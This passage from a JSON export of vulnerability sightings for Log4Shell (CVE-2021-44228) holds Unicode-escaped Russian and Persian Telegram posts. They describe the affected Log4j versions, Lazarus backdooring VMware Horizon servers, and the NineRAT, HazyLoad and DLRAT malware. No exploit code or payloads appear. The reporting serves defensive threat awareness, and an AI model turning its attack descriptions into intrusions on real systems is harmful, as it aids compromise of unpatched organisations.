\u0443\u0442\u0438\u043b\u0438\u0442\u0435 \u0436\u0443\u0440\u043d\u0430\u043b\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f Log4j. \u0425\u0430\u043a\u0435\u0440\u044b \u0432\u043d\u0435\u0434\u0440\u044f\u044e\u0442 \u0431\u044d\u043a\u0434\u043e\u0440\u044b \u043d\u0430 \u0441\u0435\u0440\u0432\u0435\u0440\u044b VMware Horizon, \u0447\u0442\u043e\u0431\u044b \u0437\u0430\u0440\u0430\u0437\u0438\u0442\u044c \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u043c \u041f\u041e \u0434\u043b\u044f \u043a\u0440\u0430\u0436\u0438 \u0434\u0430\u043d\u043d\u044b\u0445.\n\n\u0420\u0435\u0447\u044c \u0438\u0434\u0435\u0442 \u043e\u0431 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0443\u0434\u0430\u043b\u0451\u043d\u043d\u043e\u0433\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u043a\u043e\u0434\u0430 CVE-2021-44228, \u0442\u0430\u043a\u0436\u0435 \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u043e\u0439 \u043a\u0430\u043a Log4Shell, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u0435\u0442 \u043c\u043d\u043e\u0436\u0435\u0441\u0442\u0432\u043e \u043f\u0440\u043e\u0434\u0443\u043a\u0442\u043e\u0432, \u0432 \u0442\u043e\u043c \u0447\u0438\u0441\u043b\u0435 VMware Horizon.\n\n\u0425\u0430\u043a\u0435\u0440\u044b \u043d\u0430\u0447\u0430\u043b\u0438 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u0435 \u0441\u0435\u0440\u0432\u0435\u0440\u044b Horizon \u0432 \u044f\u043d\u0432\u0430\u0440\u0435 2022 \u0433\u043e\u0434\u0430, \u0438 \u043c\u043d\u043e\u0433\u0438\u0435 \u043e\u0441\u0442\u0430\u044e\u0442\u0441\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u043c\u0438 \u0438 \u043f\u043e \u0441\u0435\u0439 \u0434\u0435\u043d\u044c, \u043d\u0435\u0441\u043c\u043e\u0442\u0440\u044f \u043d\u0430 \u043d\u0430\u043b\u0438\u0447\u0438\u0435 \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u044b\u0445 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0439 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438.\n\n#Lazarus #VMwareHorizon #Log4Shell\n\n\ud83d\udd14 ITsec NEWS", "creation_timestamp": "2022-05-23T12:59:47.000000Z"}, {"uuid": "307cbfec-01f5-4da2-a0ac-7eea5637fd77", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/kasraone_com/360", "content": "\ud83d\udd34 CVE\n \nCVE-2021-44228\n\n\u0646\u0633\u062e\u0647 \u0647\u0627\u06cc Apache Log4j2 2.0-beta9 \u062a\u0627 2.15.0 (\u0628\u0647 \u0627\u0633\u062a\u062b\u0646\u0627\u06cc \u0646\u0633\u062e\u0647 \u0647\u0627\u06cc \u0627\u0645\u0646\u06cc\u062a\u06cc 2.12.2\u060c 2.12.3 \u0648 2.3.1) \u0627\u0632 \u0642\u0627\u0628\u0644\u06cc\u062a \u0647\u0627\u06cc JNDI \u06a9\u0647 \u062f\u0631 \u067e\u06cc\u06a9\u0631\u0628\u0646\u062f\u06cc\u060c \u067e\u06cc\u0627\u0645 \u0647\u0627\u06cc \u0644\u0627\u06af \u0648 \u067e\u0627\u0631\u0627\u0645\u062a\u0631\u0647\u0627 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0645\u06cc \u0634\u0648\u0646\u062f\u060c \u062f\u0631 \u0628\u0631\u0627\u0628\u0631 \u062d\u0645\u0644\u0627\u062a \u06a9\u0646\u062a\u0631\u0644 \u0634\u062f\u0647 \u062a\u0648\u0633\u0637 \u062d\u0645\u0644\u0627\u062a LDAP \u0648 \u0633\u0627\u06cc\u0631 \u0646\u0642\u0627\u0637 \u0645\u0631\u062a\u0628\u0637 \u0628\u0627 JNDI \u0645\u062d\u0627\u0641\u0638\u062a \u0646\u0645\u06cc \u06a9\u0646\u0646\u062f. \n\u06cc\u06a9 \u0627\u062a\u06a9\u0631  \u0645\u06cc \u062a\u0648\u0627\u0646\u062f \u067e\u06cc\u0627\u0645 \u0647\u0627 \u06cc\u0627 \u067e\u0627\u0631\u0627\u0645\u062a\u0631\u0647\u0627\u06cc \u067e\u06cc\u0627\u0645 \u0644\u0627\u06af \u0631\u0627 \u06a9\u0646\u062a\u0631\u0644 \u06a9\u0646\u062f\u060c \u0645\u06cc \u062a\u0648\u0627\u0646\u062f \u06a9\u062f \u062e\u0648\u062f \u0631\u0627 \u0627\u062c\u0631\u0627 \u06a9\u0646\u062f \u06a9\u0647 \u0627\u0632 \u0633\u0631\u0648\u06cc\u0633 \u0647\u0627\u06cc LDAP \u0628\u0627\u0631\u06af\u0630\u0627\u0631\u06cc \u0634\u062f\u0647 \u0627\u0633\u062a \u0632\u0645\u0627\u0646\u06cc \u06a9\u0647 \u062c\u0627\u06cc\u06af\u0632\u06cc\u0646\u06cc \u062c\u0633\u062a\u062c\u0648 \u062f\u0631 \u067e\u06cc\u0627\u0645 \u0641\u0639\u0627\u0644 \u0627\u0633\u062a. \u0627\u0632 \u0646\u0633\u062e\u0647 2.15.0 log4j\u060c \u0627\u06cc\u0646 \u0631\u0641\u062a\u0627\u0631 \u0628\u0647 \u0637\u0648\u0631 \u067e\u06cc\u0634 \u0641\u0631\u0636 \u063a\u06cc\u0631\u0641\u0639\u0627\u0644 \u0634\u062f\u0647 \u0627\u0633\u062a. \u0627\u0632 \u0646\u0633\u062e\u0647 2.16.0 (\u0628\u0627 \u0647\u0645\u0631\u0627\u0647 \u062f\u0627\u0634\u062a\u0646 \u0646\u0633\u062e\u0647 \u0647\u0627\u06cc 2.12.2\u060c 2.12.3 \u0648 2.3.1)\u060c \u0627\u06cc\u0646 \u0642\u0627\u0628\u0644\u06cc\u062a \u0628\u0647 \u0637\u0648\u0631 \u06a9\u0627\u0645\u0644 \u062d\u0630\u0641 \u0634\u062f\u0647 \u0627\u0633\u062a. \u062a\u0648\u062c\u0647 \u062f\u0627\u0634\u062a\u0647 \u0628\u0627\u0634\u06cc\u062f \u06a9\u0647 \u0627\u06cc\u0646 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u0645\u0631\u0628\u0648\u0637 \u0628\u0647 log4j-core \u0627\u0633\u062a \u0648 \u0628\u0631 \u0631\u0648\u06cc log4net\u060c log4cxx \u06cc\u0627 \u0633\u0627\u06cc\u0631 \u067e\u0631\u0648\u0698\u0647 \u0647\u0627\u06cc \u062e\u062f\u0645\u0627\u062a Apache Logging \u062a\u0623\u062b\u06cc\u0631\u06cc \u0646\u062f\u0627\u0631\u062f.", "creation_timestamp": "2023-07-10T19:08:11.000000Z"}, {"uuid": "36c86d01-6587-4dd9-bf16-73346524b5a8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/itsec_news/3816", "content": "\u200b\u26a1\ufe0fNineRAT: \u043d\u043e\u0432\u044b\u0439 \u0448\u043f\u0438\u043e\u043d\u0441\u043a\u0438\u0439 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441 \u043e\u0442 Lazarus \u043f\u043e\u0445\u0438\u0449\u0430\u0435\u0442 \u0434\u0430\u043d\u043d\u044b\u0435 \u0438\u0437 \u043e\u0440\u0433\u0430\u043d\u0438\u0437\u0430\u0446\u0438\u0439 \u043f\u043e \u0432\u0441\u0435\u043c\u0443 \u043c\u0438\u0440\u0443\n\n\ud83d\udcac C\u0432\u044f\u0437\u0430\u043d\u043d\u044b\u0435 \u0441 \u0421\u0435\u0432\u0435\u0440\u043d\u043e\u0439 \u041a\u043e\u0440\u0435\u0435\u0439 \u0438 \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u044b\u0435 \u043a\u0430\u043a Lazarus Group \u0445\u0430\u043a\u0435\u0440\u044b \u0432\u043d\u043e\u0432\u044c \u043f\u043e\u043f\u0430\u043b\u0438 \u043d\u0430 \u0440\u0430\u0434\u0430\u0440\u044b \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438. \u0412\u0441\u0435\u043c\u0443 \u0432\u0438\u043d\u043e\u0439 \u043d\u043e\u0432\u0430\u044f \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u0430\u044f \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u044f \u0433\u043b\u043e\u0431\u0430\u043b\u044c\u043d\u044b\u0445 \u043c\u0430\u0441\u0448\u0442\u0430\u0431\u043e\u0432, \u043a\u043e\u0442\u043e\u0440\u0443\u044e \u043e\u0440\u0433\u0430\u043d\u0438\u0437\u043e\u0432\u0430\u043b\u0438 \u044d\u0442\u0438 \u043a\u0438\u0431\u0435\u0440\u043f\u0440\u0435\u0441\u0442\u0443\u043f\u043d\u0438\u043a\u0438.\n\n\u041a\u0430\u043c\u043f\u0430\u043d\u0438\u044f \u0432\u043a\u043b\u044e\u0447\u0430\u0435\u0442 \u0432 \u0441\u0435\u0431\u044f \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 \u0431\u0438\u0431\u043b\u0438\u043e\u0442\u0435\u043a\u0435 Log4j, \u043d\u0435\u0443\u0442\u0435\u0448\u0438\u0442\u0435\u043b\u044c\u043d\u0443\u044e \u0441\u0442\u0430\u0442\u0438\u0441\u0442\u0438\u043a\u0443 \u043f\u043e \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 \u043a\u043e\u0442\u043e\u0440\u043e\u0439 \u043c\u044b \u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043b\u0438 \u0440\u0430\u043d\u0435\u0435. \u041f\u0435\u0447\u0430\u043b\u044c\u043d\u043e \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u0430\u044f Log4Shell ( CVE-2021-44228 ) \u043d\u0430 \u044d\u0442\u043e\u0442 \u0440\u0430\u0437 \u043f\u0440\u0438\u043c\u0435\u043d\u044f\u0435\u0442\u0441\u044f \u0445\u0430\u043a\u0435\u0440\u0430\u043c\u0438 \u0434\u043b\u044f \u0440\u0430\u0437\u0432\u0451\u0440\u0442\u044b\u0432\u0430\u043d\u0438\u044f \u0442\u0440\u043e\u044f\u043d\u0441\u043a\u0438\u0445 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c \u0443\u0434\u0430\u043b\u0451\u043d\u043d\u043e\u0433\u043e \u0434\u043e\u0441\u0442\u0443\u043f\u0430 (RAT) \u043d\u0430 \u0441\u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0445 \u0445\u043e\u0441\u0442\u0430\u0445.\n\n\u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 Cisco Talos \u043e\u0442\u0441\u043b\u0435\u0436\u0438\u0432\u0430\u044e\u0442 \u044d\u0442\u0443 \u0430\u043a\u0442\u0438\u0432\u043d\u043e\u0441\u0442\u044c \u043f\u043e\u0434 \u043d\u0430\u0437\u0432\u0430\u043d\u0438\u0435\u043c \u00abOperation Blacksmith\u00bb, \u043e\u0442\u043c\u0435\u0447\u0430\u044f \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 \u043a\u0438\u0431\u0435\u0440\u0437\u043b\u043e\u0434\u0435\u044f\u043c\u0438 \u0441\u0440\u0430\u0437\u0443 \u0442\u0440\u0435\u0445 \u0441\u0435\u043c\u0435\u0439\u0441\u0442\u0432 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0433\u043e \u041f\u041e \u043d\u0430 \u0431\u0430\u0437\u0435 Dlang.\n\n\u041f\u043e\u0441\u043b\u0435\u0434\u043d\u0438\u0435 \u0442\u0430\u043a\u0442\u0438\u043a\u0438 Lazarus \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u0438\u0441\u0442\u044b \u043e\u043f\u0438\u0441\u044b\u0432\u0430\u044e\u0442 \u043a\u0430\u043a \u043e\u043f\u0440\u0435\u0434\u0435\u043b\u0451\u043d\u043d\u044b\u0439 \u0441\u0434\u0432\u0438\u0433, \u044f\u0432\u043d\u043e \u043f\u0435\u0440\u0435\u0441\u0435\u043a\u0430\u044e\u0449\u0438\u0439\u0441\u044f \u0441 \u0434\u0435\u044f\u0442\u0435\u043b\u044c\u043d\u043e\u0441\u0442\u044c\u044e \u0433\u0440\u0443\u043f\u043f\u044b Andariel (\u0442\u0430\u043a\u0436\u0435 \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u043e\u0439 \u043a\u0430\u043a Onyx Sleet \u0438\u043b\u0438 Silent Chollima), \u044f\u0432\u043b\u044f\u044e\u0449\u0435\u0439\u0441\u044f \u043f\u043e\u0434\u0433\u0440\u0443\u043f\u043f\u043e\u0439 Lazarus.\n\n\u00abAndariel \u043e\u0431\u044b\u0447\u043d\u043e \u0437\u0430\u043d\u0438\u043c\u0430\u0435\u0442\u0441\u044f \u043f\u0435\u0440\u0432\u043e\u043d\u0430\u0447\u0430\u043b\u044c\u043d\u044b\u043c \u0434\u043e\u0441\u0442\u0443\u043f\u043e\u043c, \u0440\u0430\u0437\u0432\u0435\u0434\u043a\u043e\u0439 \u0438 \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0435\u043c \u0434\u043e\u043b\u0433\u043e\u0441\u0440\u043e\u0447\u043d\u043e\u0433\u043e \u0434\u043e\u0441\u0442\u0443\u043f\u0430 \u0434\u043b\u044f \u0448\u043f\u0438\u043e\u043d\u0430\u0436\u0430 \u0432 \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u0430\u0445 \u043f\u0440\u0430\u0432\u0438\u0442\u0435\u043b\u044c\u0441\u0442\u0432\u0430 \u0421\u0435\u0432\u0435\u0440\u043d\u043e\u0439 \u041a\u043e\u0440\u0435\u0438\u00bb, \u2014 \u0433\u043e\u0432\u043e\u0440\u0438\u0442\u0441\u044f \u0432 \u0442\u0435\u0445\u043d\u0438\u0447\u0435\u0441\u043a\u043e\u043c \u043e\u0442\u0447\u0451\u0442\u0435 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439 Talos.\n\n\u0426\u0435\u043f\u043e\u0447\u043a\u0438 \u0430\u0442\u0430\u043a \u0432\u043a\u043b\u044e\u0447\u0430\u044e\u0442 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 CVE-2021-44228 \u043f\u0440\u043e\u0442\u0438\u0432 \u043e\u0431\u0449\u0435\u0434\u043e\u0441\u0442\u0443\u043f\u043d\u044b\u0445 \u0441\u0435\u0440\u0432\u0435\u0440\u043e\u0432 VMWare Horizon \u0434\u043b\u044f \u0434\u043e\u0441\u0442\u0430\u0432\u043a\u0438 NineRAT. \u041a \u043e\u0441\u043d\u043e\u0432\u043d\u044b\u043c \u043e\u0442\u0440\u0430\u0441\u043b\u044f\u043c, \u043f\u043e\u0434\u0432\u0435\u0440\u0433\u0448\u0438\u043c\u0441\u044f \u0430\u0442\u0430\u043a\u0430\u043c, \u043e\u0442\u043d\u043e\u0441\u044f\u0442\u0441\u044f \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u0434\u0441\u0442\u0432\u043e, \u0441\u0435\u043b\u044c\u0441\u043a\u043e\u0435 \u0445\u043e\u0437\u044f\u0439\u0441\u0442\u0432\u043e \u0438 \u0444\u0438\u0437\u0438\u0447\u0435\u0441\u043a\u0430\u044f \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u044c.\n\n\u0418\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 Log4Shell \u043d\u0435\u0443\u0434\u0438\u0432\u0438\u0442\u0435\u043b\u044c\u043d\u043e, \u0443\u0447\u0438\u0442\u044b\u0432\u0430\u044f, \u0447\u0442\u043e 2.8% \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u0439 \u0432\u0441\u0451 \u0435\u0449\u0451 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442 \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u0435 \u0432\u0435\u0440\u0441\u0438\u0438 \u0431\u0438\u0431\u043b\u0438\u043e\u0442\u0435\u043a\u0438 \u0441\u043f\u0443\u0441\u0442\u044f \u0434\u0432\u0430 \u0433\u043e\u0434\u0430 \u043f\u043e\u0441\u043b\u0435 \u0432\u044b\u0445\u043e\u0434\u0430 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f.\n\nNineRAT, \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0430\u043d\u043d\u044b\u0439 \u0432 \u043c\u0430\u0435 2022 \u0433\u043e\u0434\u0430, \u0431\u044b\u043b \u0432\u043f\u0435\u0440\u0432\u044b\u0435 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d \u0432 \u043c\u0430\u0440\u0442\u0435 2023 \u0433\u043e\u0434\u0430 \u0432 \u0430\u0442\u0430\u043a\u0435 \u043d\u0430 \u0441\u0435\u043b\u044c\u0441\u043a\u043e\u0445\u043e\u0437\u044f\u0439\u0441\u0442\u0432\u0435\u043d\u043d\u0443\u044e \u043e\u0440\u0433\u0430\u043d\u0438\u0437\u0430\u0446\u0438\u044e \u0432 \u042e\u0436\u043d\u043e\u0439 \u0410\u043c\u0435\u0440\u0438\u043a\u0435. \u0417\u0430\u0442\u0435\u043c \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441 \u0431\u044b\u043b \u0441\u043d\u043e\u0432\u0430 \u043f\u0440\u0438\u043c\u0435\u043d\u0451\u043d \u0441\u0435\u043d\u0442\u044f\u0431\u0440\u0435 2023 \u0433\u043e\u0434\u0430 \u043d\u0430 \u0435\u0432\u0440\u043e\u043f\u0435\u0439\u0441\u043a\u0443\u044e \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u0434\u0441\u0442\u0432\u0435\u043d\u043d\u0443\u044e \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u044e. \u041a\u0430\u043a \u0441\u043e\u043e\u0431\u0449\u0430\u0435\u0442\u0441\u044f, \u0434\u043b\u044f \u0443\u043a\u043b\u043e\u043d\u0435\u043d\u0438\u044f \u043e\u0442 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0438\u044f \u0445\u0430\u043a\u0435\u0440\u044b \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0438 Telegram \u0432 \u043a\u0430\u0447\u0435\u0441\u0442\u0432\u0435 \u043a\u0430\u043d\u0430\u043b\u0430 \u0434\u043b\u044f \u043e\u0442\u043f\u0440\u0430\u0432\u043a\u0438 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0445 \u043a\u043e\u043c\u0430\u043d\u0434.\n\n\u0412\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0435 \u041f\u041e \u0434\u0435\u0439\u0441\u0442\u0432\u0443\u0435\u0442 \u043a\u0430\u043a \u043e\u0441\u043d\u043e\u0432\u043d\u043e\u0435 \u0441\u0440\u0435\u0434\u0441\u0442\u0432\u043e \u0432\u0437\u0430\u0438\u043c\u043e\u0434\u0435\u0439\u0441\u0442\u0432\u0438\u044f \u0441 \u0437\u0430\u0440\u0430\u0436\u0451\u043d\u043d\u043e\u0439 \u043a\u043e\u043d\u0435\u0447\u043d\u043e\u0439 \u0442\u043e\u0447\u043a\u043e\u0439, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044f \u0430\u0442\u0430\u043a\u0443\u044e\u0449\u0438\u043c \u043e\u0442\u043f\u0440\u0430\u0432\u043b\u044f\u0442\u044c \u043a\u043e\u043c\u0430\u043d\u0434\u044b \u0434\u043b\u044f \u0441\u0431\u043e\u0440\u0430 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438 \u043e \u0441\u0438\u0441\u0442\u0435\u043c\u0435, \u0437\u0430\u0433\u0440\u0443\u0437\u043a\u0438 \u0444\u0430\u0439\u043b\u043e\u0432, \u0441\u043a\u0430\u0447\u0438\u0432\u0430\u043d\u0438\u044f \u0434\u043e\u043f\u043e\u043b\u043d\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u0445 \u0444\u0430\u0439\u043b\u043e\u0432 \u0438 \u0434\u0430\u0436\u0435 \u0443\u0434\u0430\u043b\u0435\u043d\u0438\u044f \u0438 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f \u0441\u0430\u043c\u043e\u0433\u043e \u0441\u0435\u0431\u044f.\n\n\u00ab\u041a\u0430\u043a \u0442\u043e\u043b\u044c\u043a\u043e NineRAT \u0430\u043a\u0442\u0438\u0432\u0438\u0440\u0443\u0435\u0442\u0441\u044f, \u043e\u043d \u043f\u0440\u0438\u043d\u0438\u043c\u0430\u0435\u0442 \u043f\u0435\u0440\u0432\u043e\u043d\u0430\u0447\u0430\u043b\u044c\u043d\u044b\u0435 \u043a\u043e\u043c\u0430\u043d\u0434\u044b \u0441 C2-\u043a\u0430\u043d\u0430\u043b\u0430 \u0432 Telegram, \u0447\u0442\u043e\u0431\u044b \u0441\u043d\u043e\u0432\u0430 \u0441\u043e\u0431\u0440\u0430\u0442\u044c \u0446\u0438\u0444\u0440\u043e\u0432\u044b\u0435 \u043e\u0442\u043f\u0435\u0447\u0430\u0442\u043a\u0438 \u0437\u0430\u0440\u0430\u0436\u0451\u043d\u043d\u044b\u0445 \u0441\u0438\u0441\u0442\u0435\u043c\u00bb, \u2014 \u043e\u0442\u043c\u0435\u0447\u0430\u044e\u0442 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438.\n\n\u0422\u0430\u043a\u0436\u0435 \u0432 \u0430\u0442\u0430\u043a\u0430\u0445 \u0431\u044b\u043b \u0437\u0430\u043c\u0435\u0447\u0435\u043d \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u044c\u043d\u044b\u0439 \u043f\u0440\u043e\u043a\u0441\u0438-\u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442 \u043f\u043e\u0434 \u043d\u0430\u0437\u0432\u0430\u043d\u0438\u0435\u043c HazyLoad, \u0440\u0430\u043d\u0435\u0435 \u0438\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u0446\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0439 Microsoft \u043a\u0430\u043a \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c\u044b\u0439 Lazarus \u0432 \u0440\u0430\u043c\u043a\u0430\u0445 \u0441\u0432\u043e\u0438\u0445 \u0432\u0442\u043e\u0440\u0436\u0435\u043d\u0438\u0439, \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u044e\u0449\u0438\u0445 \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0438\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 JetBrains TeamCity. HazyLoad \u0437\u0430\u0433\u0440\u0443\u0436\u0430\u0435\u0442\u0441\u044f \u0438 \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0435\u0442\u0441\u044f \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u0434\u0440\u0443\u0433\u043e\u0433\u043e \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0433\u043e \u041f\u041e \u043f\u043e\u0434 \u043d\u0430\u0437\u0432\u0430\u043d\u0438\u0435\u043c BottomLoader.\n\n\u041a\u0440\u043e\u043c\u0435 \u0442\u043e\u0433\u043e, \u0432 \u0440\u0430\u043c\u043a\u0430\u0445 Operation Blacksmith \u043d\u0430\u0431\u043b\u044e\u0434\u0430\u0435\u0442\u0441\u044f \u0434\u043e\u0441\u0442\u0430\u0432\u043a\u0430 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u0430 DLRAT, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u043a\u0430\u043a \u0437\u0430\u0433\u0440\u0443\u0437\u0447\u0438\u043a\u043e\u043c, \u0442\u0430\u043a \u0438 \u0442\u0440\u043e\u044f\u043d\u043e\u043c \u0443\u0434\u0430\u043b\u0451\u043d\u043d\u043e\u0433\u043e \u0434\u043e\u0441\u0442\u0443\u043f\u0430, \u0441\u043f\u043e\u0441\u043e\u0431\u043d\u044b\u043c \u043f\u0440\u043e\u0432\u043e\u0434\u0438\u0442\u044c \u0440\u0430\u0437\u0432\u0435\u0434\u043a\u0443 \u0441\u0438\u0441\u0442\u0435\u043c\u044b, \u0440\u0430\u0437\u0432\u043e\u0440\u0430\u0447\u0438\u0432\u0430\u0442\u044c \u0434\u043e\u043f\u043e\u043b\u043d\u0438\u0442\u0435\u043b\u044c\u043d\u043e\u0435 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0435 \u041f\u041e \u0438 \u043f\u043e\u043b\u0443\u0447\u0430\u0442\u044c \u043a\u043e\u043c\u0430\u043d\u0434\u044b \u043e\u0442 C2-\u0441\u0435\u0440\u0432\u0435\u0440\u0430.\n\n\u0420\u0430\u0441\u0441\u043c\u043e\u0442\u0440\u0435\u043d\u043d\u0430\u044f \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u0430\u044f \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u044f \u043d\u0430\u0433\u043b\u044f\u0434\u043d\u043e \u0434\u0435\u043c\u043e\u043d\u0441\u0442\u0440\u0438\u0440\u0443\u0435\u0442 \u043d\u0430\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u043e\u043f\u0430\u0441\u043d\u043e \u0438\u0433\u043d\u043e\u0440\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u043d\u043e\u043c \u043e\u0431\u0435\u0441\u043f\u0435\u0447\u0435\u043d\u0438\u0438. \u0425\u043e\u0442\u044f \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435 \u0434\u043b\u044f Log4Shell \u043f\u043e\u044f\u0432\u0438\u043b\u043e\u0441\u044c \u0434\u0432\u0430 \u0433\u043e\u0434\u0430 \u043d\u0430\u0437\u0430\u0434, \u0445\u0430\u043a\u0435\u0440\u044b \u043f\u043e-\u043f\u0440\u0435\u0436\u043d\u0435\u043c\u0443 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u044e\u0442 \u0435\u0433\u043e \u0434\u043b\u044f \u043f\u0440\u043e\u043d\u0438\u043a\u043d\u043e\u0432\u0435\u043d\u0438\u044f \u0432 \u0441\u0435\u0442\u0438, \u043f\u043e\u0442\u043e\u043c\u0443 \u0447\u0442\u043e \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u0438 \u043d\u0435 \u0441\u043e\u0447\u043b\u0438 \u043d\u0443\u0436\u043d\u044b\u043c \u0432\u043e\u0432\u0440\u0435\u043c\u044f \u043e\u0431\u043d\u043e\u0432\u0438\u0442\u044c \u0431\u0438\u0431\u043b\u0438\u043e\u0442\u0435\u043a\u0443 \u0432 \u0440\u0430\u0437\u0440\u0430\u0431\u0430\u0442\u044b\u0432\u0430\u0435\u043c\u044b\u0445 \u043f\u0440\u043e\u0434\u0443\u043a\u0442\u0430\u0445.\n\n\u041a\u043e\u043c\u043f\u0430\u043d\u0438\u044f\u043c \u0441\u043b\u0435\u0434\u0443\u0435\u0442 \u0440\u0435\u0433\u0443\u043b\u044f\u0440\u043d\u043e \u043e\u0431\u043d\u043e\u0432\u043b\u044f\u0442\u044c \u0441\u0432\u043e\u0451 \u041f\u041e \u0438 \u0442\u0449\u0430\u0442\u0435\u043b\u044c\u043d\u043e \u0441\u043b\u0435\u0434\u0438\u0442\u044c \u0437\u0430 \u043d\u043e\u0432\u044b\u043c\u0438 \u0443\u0433\u0440\u043e\u0437\u0430\u043c\u0438. \u0422\u0430\u043a\u0436\u0435 \u0432\u0430\u0436\u043d\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c 